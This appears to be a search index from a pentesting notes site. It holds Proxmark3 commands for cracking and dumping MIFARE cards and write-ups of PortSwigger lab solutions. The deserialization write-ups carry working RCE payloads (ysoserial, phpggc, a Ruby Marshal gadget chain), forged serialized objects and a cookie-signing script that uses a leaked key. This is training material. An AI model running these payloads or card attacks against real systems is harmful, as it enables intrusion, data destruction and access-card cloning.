        [usb] pm3 --> lf\n[usb] pm3 --> hf\n

        To search quickly for known LF or HF tags:

        [usb] pm3 --> lf search\n[usb] pm3 --> hf search\n

To get info on an ISO14443-A tag:

        [usb] pm3 --> hf 14a info\n

        Read and write:

        # Read sector 1 with key FFFFFFFFFFFF\nhf mf rdsc -s 1 -k FFFFFFFFFFFF\n\n# Read block 13 with key FFFFFFFFFFFF\nhf mf rdbl --blk 13 -k FFFFFFFFFFFF\n\n# Write block 8 with key a FFFFFFFFFFFF \nhf mf wrbl --blk 8 -a -k FFFFFFFFFFFF -d FFFFFFFFFFFF7F078800FFFFFFFFFFFF\n

        Getting keys

        # Check all sectors, all keys, 1K, and write to file\nhf mf chk --1k --dump             \n\n# Check for default keys:\nhf mf chk --1k -f mfc_default_keys\n\n# Check dictionary against block 0, key A\nhf mf chk -a --tblk 0 -f mfc_default_keys.dic       \n\n# Run autopwn, to extract all keys and backup a MIFARE Classic tag\nhf mf autopwn\n\n\nhf mf nested --1k --blk 0 -a -k FFFFFFFFFFFF --dump\n\n# Dump MIFARE Classic card contents:\nhf mf dump\nhf mf dump --1k -k hf-mf-A29558E4-key.bin -f hf-mf-A29558E4-dump.bin\n\n\n# Write to MIFARE Classic block:\nhf mf wrbl --blk 0 -k FFFFFFFFFFFF -d d3a2859f6b880400c801002000000016\n\n\n# Bruteforce MIFARE Classic card numbers from 11223344 to 11223346:\nscript run hf_mf_uidbruteforce -s 0x11223344 -e 0x11223346 -t 1000 -x mfc\n\n# Bruteforce MIFARE Ultralight EV1 card numbers from 11223344556677 to 11223344556679\nscript run hf_mf_uidbruteforce -s 0x11223344556677 -e 0x11223344556679 -t 1000 -x mfu\n
        ","tags":["pentesting","NFC","pentesting"]},{"location":"RFID/proxmark3/#next-steps","title":"Next steps","text":"
        • https://github.com/RfidResearchGroup/proxmark3/blob/master/doc/cheatsheet.md
        • https://github.com/Proxmark/proxmark3/wiki/Generic-ISO14443-Ops
        • https://github.com/RfidResearchGroup/proxmark3/wiki/More-cheat-sheets
        ","tags":["pentesting","NFC","pentesting"]},{"location":"RFID/rfid/","title":"RFID","text":"

An RFID reader continuously sends radio waves. When a tag is in range, it sends its feedback signal back to the reader.

There are three basic types of RFID frequencies:

        • Low Frequency (LF) 125 kHz or 134 kHz Range 8-10 cm
        • High Frequency (HF) 13.56 MHz Range approx. 1 m
        • Ultra High Frequency (UHF) 860-960 MHz Range 10 - 15 m
        ","tags":["pentesting","RFID"]},{"location":"RFID/rfid/#quick-overview-of-arduino","title":"Quick Overview of Arduino","text":"
• Arduino is an open-source hardware platform
• Single board with a microcontroller (ATmega328P)
        • Attach different modules and sensors
        • Different versions of Arduino

        Download Arduino IDE.

        ","tags":["pentesting","RFID"]},{"location":"RFID/rfid/#requirements","title":"Requirements","text":"

RFID cards we need:
• Mifare Classic cards (1K, 4K, EV1): the UID is not changeable.
• Magic cards: the UID is changeable.

For programming Mifare cards we will use:

        • ACR122u
• MFRC522 with STM8
        • USB to TTL
        • STM8 & STM32 USB
        • Jumper wires (female to female)

More tools required:

        • Arduino UNO
        • RC522 Module
        • OLED 4 Pin
        • Breadboard
        • Jumper wires
        • Buzzer
        ","tags":["pentesting","RFID"]},{"location":"burpsuite/burpsuite-broken-access-control/","title":"BurpSuite Labs - Broken access control vulnerabilities","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#unprotected-admin-functionality","title":"Unprotected admin functionality","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation","title":"Enunciation","text":"

        This lab has an unprotected admin panel.

        Solve the lab by deleting the user\u00a0carlos.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution","title":"Solution","text":"

See the robots.txt page. Enter the admin panel URL in the browser and delete the user carlos.
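
A quick way to check it from the command line; a sketch where YOUR-LAB-ID stands for the lab's hostname:

curl https://YOUR-LAB-ID.web-security-academy.net/robots.txt\n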

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#unprotected-admin-functionality-with-unpredictable-url","title":"Unprotected admin functionality with unpredictable URL","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_1","title":"Enunciation","text":"

        This lab has an unprotected admin panel. It's located at an unpredictable location, but the location is disclosed somewhere in the application.

        Solve the lab by accessing the admin panel, and using it to delete the user\u00a0carlos.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_1","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-role-controlled-by-request-parameter","title":"User role controlled by request parameter","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_2","title":"Enunciation","text":"

        This lab has an admin panel at\u00a0/admin, which identifies administrators using a forgeable cookie.

        Solve the lab by accessing the admin panel and using it to delete the user\u00a0carlos.

        You can log in to your own account using the following credentials:\u00a0wiener:peter

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_2","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-role-can-be-modified-in-user-profile","title":"User role can be modified in user profile","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_3","title":"Enunciation","text":"

        This lab has an admin panel at\u00a0/admin. It's only accessible to logged-in users with a\u00a0roleid\u00a0of 2.

        Solve the lab by accessing the admin panel and using it to delete the user\u00a0carlos.

        You can log in to your own account using the following credentials:\u00a0wiener:peter

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_3","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#url-based-access-control-can-be-circumvented","title":"URL-based access control can be circumvented","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_4","title":"Enunciation","text":"

        This website has an unauthenticated admin panel at /admin, but a front-end system has been configured to block external access to that path. However, the back-end application is built on a framework that supports the X-Original-URL header.

To solve the lab, access the admin panel and delete the user carlos.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_4","title":"Solution","text":"

Send a request for /?username=carlos with the X-Original-URL: /admin/delete header. You will see a 302 and, following the redirection, a 403, BUT refresh the lab page and you will see that the lab was successfully solved.
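
As a sketch of that final request (YOUR-LAB-ID is a placeholder; you may also need to include your session cookie):

curl -i -H \"X-Original-URL: /admin/delete\" \"https://YOUR-LAB-ID.web-security-academy.net/?username=carlos\"\n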

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#method-based-access-control-can-be-circumvented","title":"Method-based access control can be circumvented","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_5","title":"Enunciation","text":"

        This lab implements access controls based partly on the HTTP method of requests. You can familiarize yourself with the admin panel by logging in using the credentials\u00a0administrator:admin.

        To solve the lab, log in using the credentials\u00a0wiener:peter\u00a0and exploit the flawed access controls to promote yourself to become an administrator.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_5","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-id-controlled-by-request-parameter","title":"User ID controlled by request parameter","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_6","title":"Enunciation","text":"

        This lab has a horizontal privilege escalation vulnerability on the user account page.

        To solve the lab, obtain the API key for the user\u00a0carlos\u00a0and submit it as the solution.

        You can log in to your own account using the following credentials:\u00a0wiener:peter

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_6","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-id-controlled-by-request-parameter-with-unpredictable-user-ids","title":"User ID controlled by request parameter, with unpredictable user IDs","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_7","title":"Enunciation","text":"

        This lab has a horizontal privilege escalation vulnerability on the user account page, but identifies users with GUIDs.

        To solve the lab, find the GUID for carlos, then submit his API key as the solution.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_7","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-id-controlled-by-request-parameter-with-data-leakage-in-redirect","title":"User ID controlled by request parameter with data leakage in redirect","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_8","title":"Enunciation","text":"

        This lab contains an access control vulnerability where sensitive information is leaked in the body of a redirect response.

        To solve the lab, obtain the API key for the user carlos and submit it as the solution.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_8","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#user-id-controlled-by-request-parameter-with-password-disclosure","title":"User ID controlled by request parameter with password disclosure","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_9","title":"Enunciation","text":"

This lab has a user account page that contains the current user's existing password, prefilled in a masked input.

        To solve the lab, retrieve the administrator's password, then use it to delete the user carlos.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_9","title":"Solution","text":"

        Log in as administrator, go to the admin panel, and delete carlos.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#insecure-direct-object-references","title":"Insecure direct object references","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_10","title":"Enunciation","text":"

        This lab stores user chat logs directly on the server's file system, and retrieves them using static URLs.

        Solve the lab by finding the password for the user carlos, and logging into their account.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_10","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#multi-step-process-with-no-access-control-on-one-step","title":"Multi-step process with no access control on one step","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_11","title":"Enunciation","text":"

        This lab has an admin panel with a flawed multi-step process for changing a user's role. You can familiarize yourself with the admin panel by logging in using the credentials\u00a0administrator:admin.

        To solve the lab, log in using the credentials\u00a0wiener:peter\u00a0and exploit the flawed access controls to promote yourself to become an administrator.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_11","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#referer-based-access-control","title":"Referer-based access control","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#enunciation_12","title":"Enunciation","text":"

        This lab controls access to certain admin functionality based on the Referer header. You can familiarize yourself with the admin panel by logging in using the credentials\u00a0administrator:admin.

        To solve the lab, log in using the credentials\u00a0wiener:peter\u00a0and exploit the flawed access controls to promote yourself to become an administrator.

        ","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-broken-access-control/#solution_12","title":"Solution","text":"","tags":["burpsuite","ssrf"]},{"location":"burpsuite/burpsuite-insecure-deserialization/","title":"BurpSuite Labs - Insecure deserialization","text":"","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#modifying-serialized-objects","title":"Modifying serialized objects","text":"

        APPRENTICE Modifying serialized objects

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation","title":"Enunciation","text":"

        This lab uses a serialization-based session mechanism and is vulnerable to privilege escalation as a result. To solve the lab, edit the serialized object in the session cookie to exploit this vulnerability and gain administrative privileges. Then, delete the user carlos.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution","title":"Solution","text":"
        # Burp solution\n\n1. Log in using your own credentials. Notice that the post-login `GET /my-account` request contains a session cookie that appears to be URL and Base64-encoded.\n2. Use Burp's Inspector panel to study the request in its decoded form. Notice that the cookie is in fact a serialized PHP object. The `admin` attribute contains `b:0`, indicating the boolean value `false`. Send this request to Burp Repeater.\n3. In Burp Repeater, use the Inspector to examine the cookie again and change the value of the `admin` attribute to `b:1`. Click \"Apply changes\". The modified object will automatically be re-encoded and updated in the request.\n4. Send the request. Notice that the response now contains a link to the admin panel at `/admin`, indicating that you have accessed the page with admin privileges.\n5. Change the path of your request to `/admin` and resend it. Notice that the `/admin` page contains links to delete specific user accounts.\n6. Change the path of your request to `/admin/delete?username=carlos` and send the request to solve the lab.\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#modifying-serialized-data-types","title":"Modifying serialized data types","text":"

        PRACTITIONER Modifying serialized data types

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_1","title":"Enunciation","text":"

        This lab uses a serialization-based session mechanism and is vulnerable to authentication bypass as a result. To solve the lab, edit the serialized object in the session cookie to access the administrator account. Then, delete the user carlos.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_1","title":"Solution","text":"

Capture the session cookie of the regular user wiener:peter. Send a request containing the cookie to the Repeater module. Use the Inspector to modify the value of the cookie:

        Original values:

        O:4:\"User\":2:{s:8:\"username\";s:6:\"wiener\";s:12:\"access_token\";s:32:\"bzz9fbv8uzas714errnha1q5ppbzyf5h\";}\n

        Crafted values:

        O:4:\"User\":2:{s:8:\"username\";s:13:\"administrator\";s:12:\"access_token\";i:0;}\n

        What we did:

        • Update the length of the username attribute to 13.
        • Change the username to administrator.
        • Change the access token to the integer 0. As this is no longer a string, you also need to remove the double-quotes surrounding the value.
        • Update the data type label for the access token by replacing s with i.
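
To see why the length prefix and the type label matter, here is a minimal illustration of PHP's serialization format, assuming a local PHP CLI is available:

php -r 'echo serialize(\"administrator\"), PHP_EOL, serialize(0), PHP_EOL;'\n# s:13:\"administrator\"\n# i:0\n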

        # Burp solution\n1. Log in using your own credentials. In Burp, open the post-login `GET /my-account` request and examine the session cookie using the Inspector to reveal a serialized PHP object. Send this request to Burp Repeater.\n2. In Burp Repeater, use the Inspector panel to modify the session cookie as follows:\n\n    - Update the length of the `username` attribute to `13`.\n    - Change the username to `administrator`.\n    - Change the access token to the integer `0`. As this is no longer a string, you also need to remove the double-quotes surrounding the value.\n    - Update the data type label for the access token by replacing `s` with `i`.\n\n    The result should look like this:\n\n    `O:4:\"User\":2:{s:8:\"username\";s:13:\"administrator\";s:12:\"access_token\";i:0;}`\n3. Click \"Apply changes\". The modified object will automatically be re-encoded and updated in the request.\n4. Send the request. Notice that the response now contains a link to the admin panel at `/admin`, indicating that you have successfully accessed the page as the `administrator` user.\n5. Change the path of your request to `/admin` and resend it. Notice that the `/admin` page contains links to delete specific user accounts.\n6. Change the path of your request to `/admin/delete?username=carlos` and send the request to solve the lab.\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#using-application-functionality-to-exploit-insecure-deserialization","title":"Using application functionality to exploit insecure deserialization","text":"

        PRACTITIONER Using application functionality to exploit insecure deserialization

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_2","title":"Enunciation","text":"

        This lab uses a serialization-based session mechanism. A certain feature invokes a dangerous method on data provided in a serialized object. To solve the lab, edit the serialized object in the session cookie and use it to delete the morale.txt file from Carlos's home directory.

        You can log in to your own account using the following credentials: wiener:peter

        You also have access to a backup account: gregg:rosebud

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_2","title":"Solution","text":"

In the user profile there is a DELETE feature that allows users to delete their profile. When doing so, the application relies on the path provided in the session cookie (which is part of the user object) to remove the avatar.

The exploit consists of changing the path to the file we want to remove and updating the string length of the path.

        # Burp solution\n1. Log in to your own account. On the \"My account\" page, notice the option to delete your account by sending a `POST` request to `/my-account/delete`.\n2. Send a request containing a session cookie to Burp Repeater.\n3. In Burp Repeater, study the session cookie using the Inspector panel. Notice that the serialized object has an `avatar_link` attribute, which contains the file path to your avatar.\n4. Edit the serialized data so that the `avatar_link` points to `/home/carlos/morale.txt`. Remember to update the length indicator. The modified attribute should look like this:\n\n    `s:11:\"avatar_link\";s:23:\"/home/carlos/morale.txt\"`\n5. Click \"Apply changes\". The modified object will automatically be re-encoded and updated in the request.\n6. Change the request line to `POST /my-account/delete` and send the request. Your account will be deleted, along with Carlos's `morale.txt` file.\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#arbitrary-object-injection-in-php","title":"Arbitrary object injection in PHP","text":"

        PRACTITIONER Arbitrary object injection in PHP

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_3","title":"Enunciation","text":"

        This lab uses a serialization-based session mechanism and is vulnerable to arbitrary object injection as a result. To solve the lab, create and inject a malicious serialized object to delete the morale.txt file from Carlos's home directory. You will need to obtain source code access to solve this lab.

        You can log in to your own account using the following credentials: wiener:peter

        You can sometimes read source code by appending a tilde (~) to a filename to retrieve an editor-generated backup file.

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_3","title":"Solution","text":"

Review the code and notice CustomTemplate.php.

Read the file by appending a tilde (~) and find an interesting method:
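
For example, assuming YOUR-LAB-ID stands for the lab's hostname, the backup file can be fetched with:

curl https://YOUR-LAB-ID.web-security-academy.net/libs/CustomTemplate.php~\n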

The session cookie consists of a serialized object.

We will craft a serialized object that triggers the interesting method defined in CustomTemplate.php and pass it Base64-encoded via the Inspector panel:

        O:14:\"CustomTemplate\":1:{s:14:\"lock_file_path\";s:23:\"/home/carlos/morale.txt\";}\n

        Run the request!

        # Burp solution\n1. Log in to your own account and notice the session cookie contains a serialized PHP object.\n2. From the site map, notice that the website references the file `/libs/CustomTemplate.php`. Right-click on the file and select \"Send to Repeater\".\n3. In Burp Repeater, notice that you can read the source code by appending a tilde (`~`) to the filename in the request line.\n4. In the source code, notice the `CustomTemplate` class contains the `__destruct()` magic method. This will invoke the `unlink()` method on the `lock_file_path` attribute, which will delete the file on this path.\n5. In Burp Decoder, use the correct syntax for serialized PHP data to create a `CustomTemplate` object with the `lock_file_path` attribute set to `/home/carlos/morale.txt`. Make sure to use the correct data type labels and length indicators. The final object should look like this:\n\n    `O:14:\"CustomTemplate\":1:{s:14:\"lock_file_path\";s:23:\"/home/carlos/morale.txt\";}`\n6. Base64 and URL-encode this object and save it to your clipboard.\n7. Send a request containing the session cookie to Burp Repeater.\n8. In Burp Repeater, replace the session cookie with the modified one in your clipboard.\n9. Send the request. The `__destruct()` magic method is automatically invoked and will delete Carlos's file.\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#exploiting-java-deserialization-with-apache-commons","title":"Exploiting Java deserialization with Apache Commons","text":"

        PRACTITIONER Exploiting Java deserialization with Apache Commons

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_4","title":"Enunciation","text":"

        This lab uses a serialization-based session mechanism and loads the Apache Commons Collections library. Although you don't have source code access, you can still exploit this lab using pre-built gadget chains.

        To solve the lab, use a third-party tool to generate a malicious serialized object containing a remote code execution payload. Then, pass this object into the website to delete the morale.txt file from Carlos's home directory.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_4","title":"Solution","text":"

Install the following two extensions in Burp Suite: Java Deserialization Scanner and Java Serial Killer. With those, when browsing the site, the live audit will show us deserialization issues:

In the Burp Suite scanner, see the issues already identified.

        Paste the vulnerable request in Deserialization Scanner > Manual testing:

Click on All issues and you can identify a disclosed vulnerability in the Apache Commons Collections 4 library. This will help in the following steps.

Now we can craft a payload using the ysoserial tool (see debugging and installation there).

As we have Java 11, our payload will be:

java -jar ysoserial-all.jar CommonsCollections4 \"rm /home/carlos/morale.txt\" | base64 -w 0 > test.txt\n\n# -w 0 : removes the line breaks.\n

Now we copy-paste that value into the session cookie, select it, and URL-encode the key characters with Ctrl+U. Then we send the request.
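
If you prefer to URL-encode the payload outside Burp, a minimal sketch assuming Python 3 is available and the payload is saved in test.txt:

python3 -c 'import sys, urllib.parse; print(urllib.parse.quote(sys.stdin.read().strip(), safe=\"\"))' < test.txt\n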

        # Burp solution\n\n1. Log in to your own account and observe that the session cookie contains a serialized Java object. Send a request containing your session cookie to Burp Repeater.\n2. Download the \"ysoserial\" tool and execute the following command. This generates a Base64-encoded serialized object containing your payload:\n\n    - In Java versions 16 and above:\n\n        `java -jar ysoserial-all.jar \\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \\ --add-opens=java.base/java.net=ALL-UNNAMED \\ --add-opens=java.base/java.util=ALL-UNNAMED \\ CommonsCollections4 'rm /home/carlos/morale.txt' | base64`\n    - In Java versions 15 and below:\n\n        `java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64`\n3. In Burp Repeater, replace your session cookie with the malicious one you just created. Select the entire cookie and then URL-encode it.\n4. Send the request to solve the lab.\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#exploiting-php-deserialization-with-a-pre-built-gadget-chain","title":"Exploiting PHP deserialization with a pre-built gadget chain","text":"

        PRACTITIONER Exploiting PHP deserialization with a pre-built gadget chain

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_5","title":"Enunciation","text":"

        This lab has a serialization-based session mechanism that uses a signed cookie. It also uses a common PHP framework. Although you don't have source code access, you can still exploit this lab's insecure deserialization using pre-built gadget chains.

        To solve the lab, identify the target framework then use a third-party tool to generate a malicious serialized object containing a remote code execution payload. Then, work out how to generate a valid signed cookie containing your malicious object. Finally, pass this into the website to delete the morale.txt file from Carlos's home directory.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_5","title":"Solution","text":"

        1. The cookie contains a Base64-encoded token, signed with a SHA-1 HMAC hash.
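
The same signature scheme can be reproduced from the shell, which is handy for sanity-checking a candidate key; a sketch where TOKEN and SECRET_KEY are placeholders:

echo -n \"$TOKEN\" | openssl dgst -sha1 -hmac \"$SECRET_KEY\"\n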

2. Changing the cookie to a fake value will expose the Symfony 4.3.6 PHP framework.

3. Also have a look at the SECRET_KEY revealed at the phpinfo URL disclosed in a developer comment.

4. phpggc has a gadget chain for that library.

        5. Create your payload with:

        ./phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64 -w 0 > test.txt\n

6. Construct a valid cookie containing this malicious object and sign it correctly using the secret key, with this template:

        <?php \n$object = \"OBJECT-GENERATED-BY-PHPGGC\"; \n$secretKey = \"LEAKED-SECRET-KEY-FROM-PHPINFO.PHP\"; \n$cookie = urlencode('{\"token\":\"' . $object . '\",\"sig_hmac_sha1\":\"' . hash_hmac('sha1', $object, $secretKey) . '\"}'); \necho $cookie;\n

Generate a file lab.php by customizing the script: use the $secretKey obtained in step 3 and the payload generated in step 5 for $object.

<?php\n$object = \"Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRh>\n$secretKey = \"cvb2w284adozzw3m2wgbhmxn7ezi9s4v\";\n$cookie = urlencode('{\"token\":\"' . $object . '\",\"sig_hmac_sha1\":\"' . hash_hmac('sha1', $object, $secretKey) . '\"}');\necho $cookie;\n

        7. Add permissions and run it:

        chmod +x lab.php\nphp lab.php\n

8. Place the generated cookie in the session cookie in Repeater and send the request.

        # Burp solution\n1. Log in and send a request containing your session cookie to Burp Repeater. Highlight the cookie and look at the **Inspector** panel.\n2. Notice that the cookie contains a Base64-encoded token, signed with a SHA-1 HMAC hash.\n3. Copy the decoded cookie from the **Inspector** and paste it into Decoder.\n4. In Decoder, highlight the token and then select **Decode as > Base64**. Notice that the token is actually a serialized PHP object.\n5. In Burp Repeater, observe that if you try sending a request with a modified cookie, an exception is raised because the digital signature no longer matches. However, you should notice that:\n    - A developer comment discloses the location of a debug file at `/cgi-bin/phpinfo.php`.\n    - The error message reveals that the website is using the Symfony 4.3.6 framework.\n6. Request the `/cgi-bin/phpinfo.php` file in Burp Repeater and observe that it leaks some key information about the website, including the `SECRET_KEY` environment variable. Save this key; you'll need it to sign your exploit later.\n7. Download the \"PHPGGC\" tool and execute the following command:\n\n    `./phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64`\n\n    This will generate a Base64-encoded serialized object that exploits an RCE gadget chain in Symfony to delete Carlos's `morale.txt` file.\n\n8. You now need to construct a valid cookie containing this malicious object and sign it correctly using the secret key you obtained earlier. You can use the following PHP script to do this. Before running the script, you just need to make the following changes:\n\n    - Assign the object you generated in PHPGGC to the `$object` variable.\n    - Assign the secret key that you copied from the `phpinfo.php` file to the `$secretKey` variable.\n\n    `<?php $object = \"OBJECT-GENERATED-BY-PHPGGC\"; $secretKey = \"LEAKED-SECRET-KEY-FROM-PHPINFO.PHP\"; $cookie = urlencode('{\"token\":\"' . $object . '\",\"sig_hmac_sha1\":\"' . hash_hmac('sha1', $object, $secretKey) . '\"}'); echo $cookie;`\n\n    This will output a valid, signed cookie to the console.\n\n9. In Burp Repeater, replace your session cookie with the malicious one you just created, then send the request to solve the lab.\n
        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#exploiting-ruby-deserialization-using-a-documented-gadget-chain","title":"Exploiting Ruby deserialization using a documented gadget chain","text":"

        PRACTITIONER Exploiting Ruby deserialization using a documented gadget chain

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#enunciation_6","title":"Enunciation","text":"

        This lab uses a serialization-based session mechanism and the Ruby on Rails framework. There are documented exploits that enable remote code execution via a gadget chain in this framework.

        To solve the lab, find a documented exploit and adapt it to create a malicious serialized object containing a remote code execution payload. Then, pass this object into the website to delete the morale.txt file from Carlos's home directory.

        You can log in to your own account using the following credentials: wiener:peter

        ","tags":["burpsuite","deserialization"]},{"location":"burpsuite/burpsuite-insecure-deserialization/#solution_6","title":"Solution","text":"

1. Provoke an error message to disclose the library performing deserialization in the session cookie:

        2. Find a documented vulnerability for that library at https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html

        3. Copy the original script:

        # Autoload the required classes\nGem::SpecFetcher\nGem::Installer\n\n# prevent the payload from running when we Marshal.dump it\nmodule Gem\n  class Requirement\n    def marshal_dump\n      [@requirements]\n    end\n  end\nend\n\nwa1 = Net::WriteAdapter.new(Kernel, :system)\n\nrs = Gem::RequestSet.allocate\nrs.instance_variable_set('@sets', wa1)\nrs.instance_variable_set('@git_set', \"id\")\n\nwa2 = Net::WriteAdapter.new(rs, :resolve)\n\ni = Gem::Package::TarReader::Entry.allocate\ni.instance_variable_set('@read', 0)\ni.instance_variable_set('@header', \"aaa\")\n\n\nn = Net::BufferedIO.allocate\nn.instance_variable_set('@io', i)\nn.instance_variable_set('@debug_output', wa2)\n\nt = Gem::Package::TarReader.allocate\nt.instance_variable_set('@io', n)\n\nr = Gem::Requirement.allocate\nr.instance_variable_set('@requirements', t)\n\npayload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])\nputs payload.inspect\nputs Marshal.load(payload)\n

        4. And modify it:

        # Autoload the required classes\nGem::SpecFetcher\nGem::Installer\n\n# prevent the payload from running when we Marshal.dump it\nmodule Gem\n  class Requirement\n    def marshal_dump\n      [@requirements]\n    end\n  end\nend\n\nwa1 = Net::WriteAdapter.new(Kernel, :system)\n\nrs = Gem::RequestSet.allocate\nrs.instance_variable_set('@sets', wa1)\nrs.instance_variable_set('@git_set', \"rm /home/carlos/morale.txt\")\n\nwa2 = Net::WriteAdapter.new(rs, :resolve)\n\ni = Gem::Package::TarReader::Entry.allocate\ni.instance_variable_set('@read', 0)\ni.instance_variable_set('@header', \"aaa\")\n\n\nn = Net::BufferedIO.allocate\nn.instance_variable_set('@io', i)\nn.instance_variable_set('@debug_output', wa2)\n\nt = Gem::Package::TarReader.allocate\nt.instance_variable_set('@io', n)\n\nr = Gem::Requirement.allocate\nr.instance_variable_set('@requirements', t)\n\npayload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])\nputs Base64.encode64(payload)\n

        Changes made:

• Replaced the last two lines with puts Base64.encode64(payload)
• Updated the line rs.instance_variable_set('@git_set', "id") to inject the payload: rs.instance_variable_set('@git_set', "rm /home/carlos/morale.txt").

        5. Run it. You can use https://onecompiler.com/ruby/

6. Paste the generated payload into the session cookie in Repeater and send the request.

